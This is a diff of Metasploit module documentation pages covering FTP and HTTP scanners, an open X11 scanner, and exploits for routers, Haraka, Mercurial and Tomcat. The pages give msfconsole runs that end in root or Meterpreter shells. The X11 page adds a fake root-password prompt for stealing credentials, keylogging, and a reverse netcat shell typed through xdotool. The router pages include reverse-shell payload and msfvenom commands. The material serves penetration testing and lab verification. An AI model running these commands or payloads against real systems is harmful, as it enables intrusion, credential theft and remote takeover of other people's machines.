3. In the Web Server (IIS) pane, scroll to the Role Services section, and then click Add Role Services.
4. On the Select Role Services page of the Add Role Services Wizard, expand FTP Server.
5. Select FTP Service. (Note: To support ASP.NET Membership or IIS Manager authentication for the FTP service, you will also need to select FTP Extensibility.)
6. Click Next.
7. On the Confirm Installation Selections page, click Install.
8. On the Results page, click Close.
#### IIS 7.5 for Windows 7:
1. On the taskbar, click Start, and then click Control Panel.
2. In Control Panel, click Programs and Features, and then click Turn Windows Features on or off.
3. Expand Internet Information Services, then FTP Server.
4. Select FTP Service. (Note: To support ASP.NET Membership or IIS Manager authentication for the FTP service, you will also need to select FTP Extensibility.)
5. Click OK.
## Verification Steps
1. Do: ```use auxiliary/scanner/ftp/ftp_login```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set RPORT [IP]```
4. Do: ```run```
## Sample Output
```
msf> use auxiliary/scanner/ftp/ftp_login
msf auxiliary(ftp_login) > set RHOSTS ftp.openbsd.org
msf auxiliary(ftp_login) > set USERNAME ftp
msf auxiliary(ftp_login) > set PASSWORD hello@metasploit.com
msf auxiliary(ftp_login) > run
[*] 129.128.5.191:21 - Starting FTP login sweep
[+] 129.128.5.191:21 - LOGIN SUCCESSFUL: ftp:hello@metasploit.com
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ftp_login) >
```

80
documentation/modules/auxiliary/scanner/ftp/ftp_version.md Normal file
View File

@ -0,0 +1,80 @@
## Description
This module allows us to scan through a series of IP Addresses and provide details about the version of ftp running on that address.
## Vulnerable Application
### Install ftp server on Kali Linux:
1. ```apt-get install vsftpd```
2. Allow local users to log in and to allow ftp uploads by editing file `/etc/vsftpd.conf` uncommenting the following:
```
local_enable=YES
write_enable=YES
chroot_list_enable=YES
chroot_list_file=/etc/vsftpd.chroot_list
```
3. Create the file `/etc/vsftpd.chroot_list` and add the local users you want allow to connect to FTP server. Start service and test connections:
4. ```service vsftpd start```
### Installing FTP for IIS 7.5 in Windows:
#### IIS 7.5 for Windows Server 2008 R2:
1. On the taskbar, click Start, point to Administrative Tools, and then click Server Manager.
2. In the Server Manager hierarchy pane, expand Roles, and then click Web Server (IIS).
3. In the Web Server (IIS) pane, scroll to the Role Services section, and then click Add Role Services.
4. On the Select Role Services page of the Add Role Services Wizard, expand FTP Server.
5. Select FTP Service. (Note: To support ASP.NET Membership or IIS Manager authentication for the FTP service, you will also need to select FTP Extensibility.)
6. Click Next.
7. On the Confirm Installation Selections page, click Install.
8. On the Results page, click Close.
#### IIS 7.5 for Windows 7:
1. On the taskbar, click Start, and then click Control Panel.
2. In Control Panel, click Programs and Features, and then click Turn Windows Features on or off.
3. Expand Internet Information Services, then FTP Server.
4. Select FTP Service. (Note: To support ASP.NET Membership or IIS Manager authentication for the FTP service, you will also need to select FTP Extensibility.)
5. Click OK.
## Verification Steps
1. Do: ```use auxiliary/scanner/ftp/ftp_version```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set RPORT [IP]```
4. Do: ```run```
## Sample Output
### On vsFTPd 3.0.3 on Kali
```
msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(ftp_version) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf auxiliary(ftp_version) > set RPORT 21
RPORT => 21
msf auxiliary(ftp_version) > exploit
[*] 127.0.0.1:21 - FTP Banner: '220 (vsFTPd 3.0.3)\x0d\x0a'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ftp_version) >
```
## Confirming using NMAP
```
root@kali:~# nmap -sV 127.0.0.1 -p21
Starting Nmap 7.40SVN ( https://nmap.org ) at 2017-04-24 23:11 IST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000035s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
Service Info: OS: Unix
root@kali:~#
```

102
documentation/modules/auxiliary/scanner/http/crawler.md Normal file
View File

@ -0,0 +1,102 @@
## Description
This module is a http crawler, it will browse the links recursively from the
web site. If you have loaded a database plugin and connected to a database,
this module will report web pages and web forms.
## Vulnerable Application
You can use any web application to test the crawler.
## Options
**URI**
Default path is `/`
**DirBust**
Bruteforce common url path, default is `true` but may generate noise in reports.
**HttpPassword**, **HttpUsername**, **HTTPAdditionalHeaders**, **HTTPCookie**
You can add some login information
**UserAgent**
Default User Agent is `Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)`
## Verification Steps
1. Do: ```use auxiliary/scanner/http/crawler```
2. Do: ```set RHOST [IP]```
3. Do: ```set RPORT [PORT]```
4. Do: ```set URI [PATH]```
4. Do: ```run```
## Sample Output
### Example against [WebGoat](https://github.com/WebGoat/WebGoat)
```
msf> use auxiliary/scanner/http/crawler
msf auxiliary(crawler) > set RHOST 127.0.0.1
msf auxiliary(crawler) > set RPORT 8080
msf auxiliary(crawler) > set URI /webgoat/
msf auxiliary(crawler) > set DirBust false
msf auxiliary(crawler) > run
[*] Crawling http://127.0.0.1:8008/webgoat/...
[*] [00001/00500] 302 - 127.0.0.1 - http://127.0.0.1:8008/webgoat/ -> /webgoat/login.mvc
[*] [00002/00500] 200 - 127.0.0.1 - http://127.0.0.1:8008/webgoat/login.mvc
[*] FORM: POST /webgoat/j_spring_security_check;jsessionid=8B1EAF2554B60EFC93A52AFCA4B6C202
[-] [00003/00500] 404 - 127.0.0.1 - http://127.0.0.1:8008/webgoat/images/favicon.ico
[*] [00004/00500] 200 - 127.0.0.1 - http://127.0.0.1:8008/webgoat/plugins/bootstrap/css/bootstrap.min.css
[*] [00005/00500] 200 - 127.0.0.1 - http://127.0.0.1:8008/webgoat/css/font-awesome.min.css
[*] [00006/00500] 200 - 127.0.0.1 - http://127.0.0.1:8008/webgoat/css/animate.css
[*] [00007/00500] 302 - 127.0.0.1 - http://127.0.0.1:8008/webgoat/j_spring_security_check;jsessionid=8B1EAF2554B60EFC93A52AFCA4B6C202 -> /webgoat/login.mvc;jsessionid=8B1EAF2554B60EFC93A52AFCA4B6C202?error
[*] [00008/00500] 200 - 127.0.0.1 - http://127.0.0.1:8008/webgoat/login.mvc;jsessionid=8B1EAF2554B60EFC93A52AFCA4B6C202?error
[*] FORM: GET /webgoat/login.mvc
[*] FORM: POST /webgoat/j_spring_security_check;jsessionid=8B1EAF2554B60EFC93A52AFCA4B6C202
[*] [00009/00500] 200 - 127.0.0.1 - http://127.0.0.1:8008/webgoat/css/main.css
[*] [00010/00500] 302 - 127.0.0.1 - http://127.0.0.1:8008/webgoat/start.mvc -> http://127.0.0.1:8008/webgoat/login.mvc
[*] [00011/00500] 200 - 127.0.0.1 - http://127.0.0.1:8008/webgoat/login.mvc
[*] FORM: POST /webgoat/j_spring_security_check
[*] Crawl of http://127.0.0.1:8008/webgoat/ complete
[*] Auxiliary module execution completed
```
## Follow-on: Wmap
As you see, the result is not very user friendly...
But you can view a tree of your website with the Wmap plugin. Simply run :
```
msf auxiliary(crawler) > load wmap
msf auxiliary(crawler) > wmap_sites -l
[*] Available sites
===============
Id Host Vhost Port Proto # Pages # Forms
-- ---- ----- ---- ----- ------- -------
0 127.0.0.1 127.0.0.1 8080 http 70 80
msf auxiliary(crawler) > wmap_sites -s 0
[127.0.0.1] (127.0.0.1)
└── webgoat (7)
├── css (3)
│ ├── animate.css
│ ├── font-awesome.min.css
│ └── main.css
├── j_spring_security_check;jsessionid=8B1EAF2554B60EFC93A52AFCA4B6C202
├── login.mvc
├── login.mvc;jsessionid=8B1EAF2554B60EFC93A52AFCA4B6C202
├── plugins (1)
│ └── bootstrap (1)
│ └── css (1)
│ └── bootstrap.min.css
├── start.mvc
└── j_spring_security_check
```

36
documentation/modules/auxiliary/scanner/http/intel_amt_digest_bypass.md Normal file
View File

@ -0,0 +1,36 @@
## Vulnerable Application
This module exploits vulnerable versions of the Intel Management Engine (ME) firmware present Intel Core CPU 1st through 7th generations that allows authentication bypass and full control over the target machine, if the Active Management Technology feature is enabled and networking is configured.
**Vulnerable Application Installation Steps**
Enable the feature in the firmware setup screen on any vulnerable target machine. The module has been tested on HP and Lenovo desktops and laptops.
## Verification Steps
A successful run of the module will look like this:
```
msf auxiliary(telnet_version) > use auxiliary/scanner/http/intel_amt_digest_bypass
msf auxiliary(intel_amt_digest_bypass) > show options
Module options (auxiliary/scanner/http/intel_amt_digest_bypass):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 16992 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
THREADS 1 yes The number of concurrent threads
VHOST no HTTP server virtual host
msf auxiliary(intel_amt_digest_bypass) > set rhosts 192.168.1.18
rhosts => 192.168.1.18
msf auxiliary(intel_amt_digest_bypass) > run
[+] 192.168.1.18:16992 - Vulnerable to CVE-2017-5869 {"Computer model"=>"30A70051US", "Manufacturer"=>"LENOVO", "Version"=>"A4KT80AUS", "Serial number"=>" ", "System ID"=>"XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX", "Product name"=>"To be filled by O.E.M.", "Asset tag"=>" ", "Replaceable?"=>"Yes", "Vendor"=>"LENOVO", "Release date"=>"09/23/2015"}
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

52
documentation/modules/auxiliary/scanner/http/robots_txt.md Normal file
View File

@ -0,0 +1,52 @@
## Description
This module will detect `robots.txt` files on web servers and analyze its content.
The `robots.txt` file is a file which is supposed to be honored by web crawlers
and bots, as locations which are not to be indexed or specifically called out
to be indexed. This can be abused to reveal interesting information about areas
of the site which an admin may not want to be public knowledge.
## Vulnerable Application
You can use almost any web application to test this module, as `robots.txt`
is extremely common.
## Verification Steps
1. Do: `use auxiliary/scanner/http/robots_txt`
2. Do: `set rhosts [ip]`
3. Do: `run`
4. You should get the `robots.txt` file content
## Options
**PATH**
You can set the test path where the scanner will try to find `robots.txt` file.
Default is `/`
## Sample Output
```
msf> use auxiliary/scanner/http/robots_txt
msf auxiliary(robots_txt) > set RHOSTS 172.217.19.238
msf auxiliary(robots_txt) > run
[*] [172.217.19.238] /robots.txt found
[+] Contents of Robots.txt:
User-agent: *
Disallow: /search
Allow: /search/about
Disallow: /sdch
Disallow: /groups
Disallow: /index.html?
Disallow: /?
```
[...Truncated...]
```
User-agent: facebookexternalhit
Allow: /imgres
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

198
documentation/modules/auxiliary/scanner/x11/open_x11.md Normal file
View File

@ -0,0 +1,198 @@
## Vulnerable Application
X11 (X Window System) is a graphical windowing system most common on unix/linux, although implementations may be found in windows
with software such as Hummingbird Exceed X Server. The service can accept connections from any users when misconfigured
which is done with the command `xhost +`.
### Ubuntu 10.04
1. `sudo nano /etc/gdm/gdm.schemas`
2. Find:
```
<schema>
<key>security/DisallowTCP</key>
<signature>b</signature>
<default>true</default>
</schema>
```
- Change `true` to `false`
3. logout or reboot
4. Verification: ```sudo netstat -antp | grep 6000```
```
tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN 1806/X
```
5. Now, to verify you allow ANYONE to get on X11, type: `xhost +`
### Ubuntu 12.04, 14.04
1. `sudo nano /etc/lightdm/lightdm.conf`
2. Under the `[SeatDefaults]` area, add:
```
xserver-allow-tcp=true
allow-guest=true
```
3. logout or reboot
4. Verification: ```sudo netstat -antp | grep 6000```
```
tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN 1806/X
```
5. Now, to verify you allow ANYONE to get on X11, type: `xhost +`
### Ubuntu 16.04
Use the Ubuntu 12.04 instructions, however change `SeatDefaults` to `Seat:*`
### Fedora 15
1. `vi /etc/gdm/custom.conf`
2. Under the `[security]` area, add:
```
DisallowTCP=false
```
3. logout/reboot
4. Now, to verify you allow ANYONE to get on X11, type: `xhost +`
### Solaris 10
1. `svccfg -s svc:/application/x11/x11-server setprop options/tcp_listen = true`
2. `svc disable cde-login`
3. `svc enable cde-login`
4. `xhost +`
## Verification Steps
1. Install and configure X11
2. Start msfconsole
3. Do: `use auxiliary/scanner/x11/open_x11`
4. Do: `set rhosts [IPs]`
5. Do: `run`
## Scenarios
A run against Ubuntu 14.04 (192.168.2.75), Ubuntu 16.04 (192.168.2.26), and Solaris 10 (192.168.2.32)
```
msf > use auxiliary/scanner/x11/open_x11
msf auxiliary(open_x11) > set rhosts 192.168.2.75 192.168.2.26
rhosts => 192.168.2.75 192.168.2.26
msf auxiliary(open_x11) > run
[+] 192.168.2.75:6000 - 192.168.2.75 Open X Server (The X.Org Foundation)
[*] Scanned 1 of 3 hosts (33% complete)
[+] 192.168.2.26:6000 - 192.168.2.26 Open X Server (The X.Org Foundation)
[*] Scanned 2 of 3 hosts (66% complete)
[+] 192.168.2.32:6000 - 192.168.2.32 Open X Server (Sun Microsystems, Inc.)
[*] Auxiliary module execution completed
```
## Confirming
The following are other industry tools which can also be used.
### [nmap](https://nmap.org/nsedoc/scripts/x11-access.html)
```
# nmap -p 6000 --script=x11-access 192.168.2.26,75
Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-23 13:15 EDT
Nmap scan report for ubuntu-desktop-16 (192.168.2.26)
Host is up (0.0021s latency).
PORT STATE SERVICE
6000/tcp open X11
|_x11-access: X server access is granted
MAC Address: 00:0C:29:60:27:F9 (VMware)
Nmap scan report for ubuntu-desktop-14 (192.168.2.75)
Host is up (0.0021s latency).
PORT STATE SERVICE
6000/tcp open X11
|_x11-access: X server access is granted
MAC Address: 00:0C:29:0E:C4:6E (VMware)
```
### xdpyinfo
This is one of the standard linux tools to get info on an X display.
```
# xdpyinfo -display 192.168.2.75:0 | head -n 5
name of display: 192.168.2.75:0
version number: 11.0
vendor string: The X.Org Foundation
vendor release number: 11803000
X.Org version: 1.18.3
```
## Exploitation
Exploiting this mis-configuration has several methods. The target can have their display viewed, keystrokes logged, and potential keyboard typed.
### Keylogging
To keylog the remote host, we use a tool called [xspy](http://tools.kali.org/sniffingspoofing/xspy)
`xspy -display [ip]:0`
### Screen Monitoring
#### Entire Display
It is possible to monitor the entire display (all windows) and view the content.
- Take a screenshot: `xwd -root -display [ip]:[display] -out xdump.xdump`
- View screenshot: `display xdump.xdump` or `xwud -in xdump.xdump`
#### Specific Window
To monitor only a single window (a terminal for instance)
First, we need to determine which windows are available and what their processes are:
- `xwininfo -tree -root -display [ip]:0`
Once you determine which window you want to monitor, you'll want to use the `windowID`. Now use the application `xwatchwin`
- `xwatchwin [ip]:0 -w [windowID]`
### Social Engineering
Obviously watching keystrokes is good, but we want to coax the user into providing their password. We can do this by using xterm to display a login box to the user.
This was tested against Ubuntu 12.04, 14.04, 16.04 and Solaris 10.
1. start `xspy`
2. `xterm -T "Root Permission Required" -display [ip]:0 -e "echo -e -n 'root password: '; read passwd; echo 'Authentication Failure'; echo -e -n 'root password: '; read passwd"`
- Notice it asks twice for the password incase of a mistyped initial password. This can also be adjusted to just say password or the real user's username
- The victim's typed text by the user will not be masked (`*`)
### Direct Exploitation
Use `exploits/unix/x11/x11_keyboard_exec`
### Typing Commands
Similar to the method `exploits/unix/x11/x11_keyboard_exec` uses, its possible to use `xdotool` to run commands on the remote system.
To install `xdotool` on kali simply run `apt-get install xdotool`
Now, you can directly interact by typing commands (which appear on the users screen), an example would be running xterm and launching netcat.
For this scenario we run a simple reverse netcat to 192.168.2.9:80
```
xdotool key alt+F2
xdotool key x t e r m
xdotool key KP_Enter
xdotool key n c space 1 9 2 period 1 6 8 period 2 period 9 space 8 0 space minus e space slash b i n slash b a s h KP_Enter
```

4
documentation/modules/exploit/linux/http/huawei_hg532n_cmdinject.md
View File

@ -38,7 +38,7 @@ that through command injection to gain Meterpreter root access.
With an attacker node that resides within the ISP network, do:
- Set `payload` to `linux/mipsbe/mettle_reverse_tcp`
- Set `payload` to `linux/mipsbe/meterpreter_reverse_tcp`
- Set `RHOST` to the target router's IP
@ -73,7 +73,7 @@ module's own HTTP server and host it externally. To do so, first generate
the payload ELF executable using `msfvenom`:
```
$ msfvenom --format elf --arch mipsbe --platform linux --payload linux/mipsbe/mettle/reverse_tcp --out payload.elf LHOST='41.34.32.121' LPORT=4444
$ msfvenom --format elf --arch mipsbe --platform linux --payload linux/mipsbe/meterpreter/reverse_tcp --out payload.elf LHOST='41.34.32.121' LPORT=4444
No encoder or badchars specified, outputting raw payload
Payload size: 212 bytes

20
documentation/modules/exploit/linux/http/netgear_r7000_cgibin_exec.md
View File

@ -17,17 +17,17 @@ Netgear R7000 and R6400 routers running firmware version `1.0.7.2_1.1.93` and po
## Options
**PAYLOAD**
The valid payloads are `mettle` payloads _only_. The payload uses the `wget` flavor and pipes the downloaded binary to `sh`
The valid payloads are `meterpreter` payloads _only_. The payload uses the `wget` flavor and pipes the downloaded binary to `sh`
## Scenarios
Sample output of a successful session:
```
msf exploit(netgear_r7000_cgibin_exec) > run
[*] Started reverse TCP handler on 127.0.0.1:4444
[*] Started reverse TCP handler on 127.0.0.1:4444
[*] Router is a NETGEAR router (R7000)
[+] Router may be vulnerable (NETGEAR R7000)
[*] Using URL: http://0.0.0.0:8080/
@ -35,16 +35,16 @@ Netgear R7000 and R6400 routers running firmware version `1.0.7.2_1.1.93` and po
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:54168) at 2017-03-10 15:56:21 -0600
[*] Server stopped.
meterpreter > getuid
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
meterpreter > sysinfo
Computer : 192.168.1.4
OS : (Linux 2.6.36.4brcmarm+)
Architecture : armv7l
Meterpreter : armle/linux
meterpreter >
meterpreter >
```
As you can see, the `uid` is 0, meaning you have root access.

53
documentation/modules/exploit/linux/http/wipg1000_cmd_injection.md Normal file
View File

@ -0,0 +1,53 @@
## Vulnerable Application
This module exploits a command injection vulnerability in the [wePresent WiPG-1000](http://wepresentwifi.com/wipg1000.html) device. A description of the exploited vulnerability is available in section 3.4 of [this advisory](https://www.redguard.ch/advisories/wepresent-wipg1000.txt).
The latest vulnerable firmware version is 2.0.0.7. Newer versions can be downgraded to [the older firmware](http://www.wepresentwifi.com/assets/downloads/wipg1000/wePresent.1000.2.0.0.7.nad.zip).
There is no complete list of vulnerable firmware versions, however the check method can reliably detect whether a device is vulnerable. The check method checks for the presence of the `rdfs.cgi` file and whether it contains the string `https://www.redguard.ch/advisories/wepresent-wipg1000.txt`. All known versions of this file on the device are vulnerable to this command injection.
Manual exploitation would equate to browsing to the URI `http://<ip>/cgi-bin/rdfs.cgi` and entering the String `; command;` in the input field and submitting the form.
Version 2.0.0.7 was confirmed vulnerable, and firmware 2.2.3.0 was released to fix the exploit.
## Verification Steps
1. Make sure the device is running.
2. Start msfconsole.
3. Do: ```use exploit/linux/http/wipg1000_cmd_injection```
4. Do: ```set payload cmd/unix/reverse_netcat```
5. Do: ```set RHOST <ip>```
6. Do: ```set LHOST <ip>```
7. Do: ```exploit```
8. You should get a shell.
## Options
**PAYLOAD**
The `generic`,`netcat` and `openssl` payload types are valid.
## Scenarios
### Firmware 2.0.0.7
The following is an example run getting a shell:
```
msf > use exploit/linux/http/wipg1000_cmd_injection
msf exploit(wipg1000_cmd_injection) > set payload cmd/unix/reverse_netcat
payload => cmd/unix/reverse_netcat
msf exploit(wipg1000_cmd_injection) > set RHOST 192.168.3.3
RHOST => 192.168.3.3
msf exploit(wipg1000_cmd_injection) > set LHOST 192.168.3.216
LHOST => 192.168.3.216
msf exploit(wipg1000_cmd_injection) > check
[*] 192.168.3.3:80 The target appears to be vulnerable.
msf exploit(wipg1000_cmd_injection) > exploit
[*] Started reverse TCP handler on 192.168.3.216:4444
[*] Sending request
[*] Command shell session 1 opened (192.168.3.216:4444 -> 192.168.3.3:50893) at 2017-04-20 16:11:48 +0200
id
uid=0(root) gid=0(root) groups=0(root),10(wheel)
```

81
documentation/modules/exploit/linux/smtp/haraka.md Normal file
View File

@ -0,0 +1,81 @@
## Vulnerable Application
Setup the vulnerable Haraka install by running this script on Ubuntu, Debian or similar:
```
#install nodejs and npm
curl -sL https://deb.nodesource.com/setup_7.x | sudo -E bash -
sudo apt install nodejs
#Haraka setup
wget https://github.com/haraka/Haraka/archive/v2.8.8.tar.gz
tar xvzf v2.8.8.tar.gz
cd Haraka-2.8.8/
npm install npm
npm install
haraka -i haraka
cat << EOF > haraka/config/plugins
access
rcpt_to.in_host_list
data.headers
attachment
test_queue
max_unrecognized_commands
EOF
echo haraka.test >> haraka/config/host_list
# Launch haraka as root
sudo haraka -c haraka
```
## Options
**from_email**
String used in the SMTP MAILFROM command
**to_email**
String used in the SMTP MAILTO command
**lhost**
The address to serve the payload from
**rhost**
The address or hostname to target
**payload**
Any compatible Metasploit payload
## Example Run
```
msf > use exploit/linux/smtp/harakiri
msf exploit(haraka) > set email_to root@haraka.test
email_to => root@haraka.test
msf exploit(haraka) > set payload linux/x64/meterpreter_reverse_http
payload => linux/x64/meterpreter_reverse_http
msf exploit(haraka) > run
[*] Started HTTP reverse handler on http://192.168.1.1:8080
[*] Exploiting...
[*] Using URL: http://192.168.1.1:8080/36CacHfIIBnBe3
[*] Sending mail to target server...
[*] http://192.168.1.1:8080 handling request from 192.168.1.2; (UUID: xoljaxxi) Redirecting stageless connection from /UJgmNdAvcM7RkNeSiIMMwg_phj2ODD0I0sgpuoWRXMCMYpHwI0ydcMlb4vVjgylZF9yr-gOpQu9aOibLROCaSBoN0tLHJRGCK0B4ZKg1aQy8LPB with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
[*] http://192.168.1.1:8080 handling request from 192.168.1.2; (UUID: xoljaxxi) Attaching orphaned/stageless session...
[*] Meterpreter session 2 opened (192.168.1.1:8080 -> 192.168.1.2:42122) at 2017-05-10 22:41:06 -0500
[*] Command Stager progress - 100.00% done (120/120 bytes)
[*] Server stopped.
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.2 - Meterpreter session 2 closed. Reason: User exit
msf exploit(haraka) >
```

53
documentation/modules/exploit/linux/ssh/mercurial_ssh_exec.md Normal file
View File

@ -0,0 +1,53 @@
## Vulnerable Application
[mercurial](https://www.mercurial-scm.org/downloads).
This module was successfully tested against:
- Kali Linux, HG 4.0 and a customized hg-ssh (to simulate custom hg-ssh wrappers which have weak repo validation)
## Vulnerable Server Setup Steps
1. Install mercurial on your test server
2. Patch the hg-ssh Python script script to emulate custom/weak repo validation in hg-ssh wrapper `vi $(which hg-ssh)`
- Replace `if repo in allowed paths:` with `if True:`
- Replace `cmd = ['-R', repo, 'serve', 'stdio']` with `cmd = ['-R', path, 'serve', 'stdio']`
3. Setup a user with SSH pubkey auth
4. Create a test repo in the users home directory and add a commit
- `mkdir -p repos/repo1`
- `cd repos/repo1`
- `echo "hello world" > README`
- `hg add README`
- `hg commit -m "Adds README"`
5. Restrict user in authorized_keys to hg-ssh binary only
- `command="hg-ssh ~/repos/repo1",no-port-forwarding,no-X11-forwarding,no-agent-forwarding INSERT_SSH_PUB_KEY`
6. Verify SSH user can authenticate (should prompt and prevent a shell)
- `ssh user@192.168.10.99`
7. Verify SSH user commands are not allows (should prevent arbitrary commands)
- `ssh user@192.168.10.99 ifconfig`
## Verification Steps
1. Start msfconsole
2. Do: `use exploit/linux/ssh/mercurial_ssh_exec`
3. Do: `set RHOST <ip>`
4. Do: `set LHOST <ip>`
5. Do: `set SSH_PRIV_KEY_FILE /Users/jsmith/.ssh/id_rsa`
6. Do: `exploit`
7. You should get a shell.
## Scenarios
### Kali Linux, HG 4.0 and a customized hg-ssh (to simulate custom hg-ssh wrappers which have weak repo validation)
```
msf exploit(mercurial_ssh_exec) > exploit
[*] Started reverse TCP handler on 192.168.10.37:4444
[*] 192.168.10.99:22 - 192.168.10.99:22 - Attempting to login...
[+] 192.168.10.99:22 - SSH connection is established.
[+] 192.168.10.99:22 - Triggered Debugger (entering debugger - type c to continue starting hg or h for help)
[*] Sending stage (39842 bytes) to 192.168.10.99
[*] Meterpreter session 1 opened (192.168.10.37:4444 -> 192.168.10.99:57606) at 2017-04-18 19:16:44 -0400
```

0
documentation/modules/exploit/linux/http/rails_dynamic_render_code_exec.md → documentation/modules/exploit/multi/http/rails_dynamic_render_code_exec.md
View File

68
documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md
View File

@ -32,7 +32,7 @@ For this exploitation, it was changed to simply `manager`.
3. Exploit:
```
msf > use exploit/multi/http/tomcat_mgr_deploy
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108
rhost => 192.168.2.108
msf exploit(tomcat_mgr_deploy) > set verbose true
@ -43,7 +43,7 @@ For this exploitation, it was changed to simply `manager`.
HttpUsername => tomcat
msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set target 1
target => 1
@ -54,8 +54,8 @@ For this exploitation, it was changed to simply `manager`.
msf exploit(tomcat_mgr_deploy) > check
[*] 192.168.2.108:8086 The target appears to be vulnerable.
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Using manually select target "Java Universal"
[*] Uploading 6071 bytes as scEYoK0.war ...
[!] No active DB -- Credential data will not be saved!
@ -63,12 +63,12 @@ For this exploitation, it was changed to simply `manager`.
[*] Undeploying scEYoK0 ...
[*] Sending stage (49409 bytes) to 192.168.2.108
[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.108:1663) at 2017-01-14 14:30:52 -0500
meterpreter > sysinfo
Computer : winxp
OS : Windows XP 5.1 (x86)
Meterpreter : java/windows
```
### Tomcat 7 (7.0.73)
@ -96,7 +96,7 @@ Of note, the user was given `manager-gui` permissions by default.
3. Exploitation:
```
msf > use exploit/multi/http/tomcat_mgr_deploy
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108
rhost => 192.168.2.108
msf exploit(tomcat_mgr_deploy) > set path /manager/text
@ -111,15 +111,15 @@ Of note, the user was given `manager-gui` permissions by default.
lhost => 192.168.2.117
msf exploit(tomcat_mgr_deploy) > set rport 8087
rport => 8087
msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set target 1
target => 1
msf exploit(tomcat_mgr_deploy) > check
[*] 192.168.2.108:8087 The target appears to be vulnerable.
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Using manually select target "Java Universal"
[*] Uploading 6086 bytes as Cl6t6gurtwIO59zV3Lt6.war ...
[!] No active DB -- Credential data will not be saved!
@ -127,7 +127,7 @@ Of note, the user was given `manager-gui` permissions by default.
[*] Undeploying Cl6t6gurtwIO59zV3Lt6 ...
[*] Sending stage (49409 bytes) to 192.168.2.108
[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.108:1656) at 2017-01-14 14:27:21 -0500
meterpreter > sysinfo
Computer : winxp
OS : Windows XP 5.1 (x86)
@ -159,12 +159,12 @@ Of note, the user was given `manager-gui` permissions by default.
3. Exploitation:
```
msf > use exploit/multi/http/tomcat_mgr_deploy
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108
rhost => 192.168.2.108
msf exploit(tomcat_mgr_deploy) > set rport 8088
rport => 8088
msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
lhost => 192.168.2.117
@ -178,15 +178,15 @@ Of note, the user was given `manager-gui` permissions by default.
msf exploit(tomcat_mgr_deploy) > set path /manager/text
path => /manager/text
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Using manually select target "Java Universal"
[*] Uploading 6085 bytes as c6TYmkd8YAe8LqKQhSCr.war ...
[*] Executing /c6TYmkd8YAe8LqKQhSCr/PtW1uMsYCIFP1gs16PUiwE7oc.jsp...
[*] Undeploying c6TYmkd8YAe8LqKQhSCr ...
[*] Sending stage (49409 bytes) to 192.168.2.108
[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.108:1196) at 2017-01-14 10:24:52 -0500
meterpreter > sysinfo
Computer : winxp
OS : Windows XP 5.1 (x86)
@ -215,7 +215,7 @@ Of note, the user was given `manager-gui` permissions by default.
3. Exploit:
```
msf > use exploit/multi/http/tomcat_mgr_deploy
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.156
rhost => 192.168.2.156
msf exploit(tomcat_mgr_deploy) > set rport 8080
@ -226,15 +226,15 @@ Of note, the user was given `manager-gui` permissions by default.
HttpUsername => tomcat
msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
HttpPassword => tomcat
msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp
payload => linux/x86/mettle/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set payload linux/x86/meterpreter/reverse_tcp
